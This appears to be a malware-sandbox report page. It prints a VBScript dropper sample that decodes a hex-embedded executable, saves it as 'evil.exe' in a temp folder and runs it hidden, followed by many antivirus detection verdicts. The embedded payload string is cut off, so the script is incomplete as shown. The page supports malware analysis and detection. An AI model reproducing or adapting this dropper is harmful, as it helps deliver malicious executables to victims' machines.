popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<script language="VBScript">
Function var_func()
var_shellcode = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010a0034e126660000000000000000e0000e030b0102290074000000580300000c0000e013000000100000009000000000400000100000000200000400000001000000040000000000000000d003000004000072d8030002004001000020000010000000001000001000000000000010000000000000000000000000e000000c07000000100100f0a802000000000000000000000000000000000000c00300500400000000000000000000000000000000000000000000000000006ca00000180000000000000000000000000000000000000044e10000080100000000000000000000000000000000000000000000000000002e7465787400000024730000001000000074000000040000000000000000000000000000600000602e6461746100000084040000009000000006000000780000000000000000000000000000400000c02e72646174610000cc09000000a00000000a0000007e0000000000000000000000000000400000402e65685f6672616
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function
var_func
self.close
</script>
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CTX txt.unknown.heur2
CAT-QuickHeal Script.Trojan.46253
Skyhigh BehavesLike.HTML.Dropper.gx
ALYac Clean
Malwarebytes Clean
Zillya Dropper.Inor.VBS.1
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu VBS.Trojan-Dropper.Agent.a
VirIT Clean
Symantec VBS.Heur.SNIC
ESET-NOD32 VBS/TrojanDropper.Agent.NNB
TrendMicro-HouseCall Trojan.VBS.COBEACON.SM
Avast VBS:Downloader-YO [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan-Dropper.Script.Generic
BitDefender GT:VB.Heur2.CVE-2018-8174.3.9E563995
NANO-Antivirus Trojan.Script.TrjGen.ebogzi
ViRobot Clean
MicroWorld-eScan GT:VB.Heur2.CVE-2018-8174.3.9E563995
Tencent Clean
Sophos Troj/Inor-Fam
F-Secure Clean
DrWeb VBS.Siggen.7605
VIPRE GT:VB.Heur2.CVE-2018-8174.3.9E563995
TrendMicro Trojan.VBS.COBEACON.SM
CMC Clean
Emsisoft GT:VB.Heur2.CVE-2018-8174.3.9E563995 (B)
huorong TrojanDropper/VBS.Agent.g
FireEye GT:VB.Heur2.CVE-2018-8174.3.9E563995
Jiangmin TrojanDropper.Script.ap
Varist VBS/Agent.TH
Avira Clean
Fortinet VBS/Dropper.SVC!tr
Antiy-AVL Clean
Kingsoft Script.Ks.Malware.16971
Gridinsoft Clean
Xcitium TrojWare.VBS.TrojanDropper.Agent.NBY@7nkapq
Arcabit GT:VB.Heur2.CVE-2018-8174.3.9E563995
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee VBS/Dropper.z
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Agent!8.2F (TOPIS:E0:TyLkoyrXauN)
Yandex Clean
Ikarus Trojan.Win32.Veilev
MaxSecure Clean
GData GT:VB.Heur2.CVE-2018-8174.3.9E563995
AVG VBS:Downloader-YO [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.